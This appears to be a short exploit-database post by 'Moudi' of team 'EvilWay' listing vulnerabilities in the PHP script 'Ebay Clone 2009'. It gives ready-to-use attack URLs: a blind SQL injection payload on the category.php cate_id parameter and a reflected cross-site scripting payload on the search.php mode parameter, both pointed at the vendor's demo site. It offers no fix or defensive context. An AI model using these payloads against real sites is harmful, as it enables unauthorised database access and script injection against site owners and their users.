Exploit for unknown platform in category web applications
==========================================================
Ebay Clone 2009 (XSS/bSQL) Multiple Remote Vulnerabilities
==========================================================
==============================================================================
[»] Ebay Clone 2009 Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ Ebay Clone 2009 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.ebayclonescript.com/ ]
[»] Team: [ EvilWay ]
[»] Price: [ 99$ ]
###########################################################################
===[ Exploit BLIND SQL ]===
[»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
[»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
===[ Exploit XSS ]===
[»] http://www.site.com/patch/search.php?mode=[XSS]
[»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Note: in this script have some other blind sql and xss , but i am tired to do all :D
Author: Moudi
###########################################################################
# 0day.today [2018-04-08] #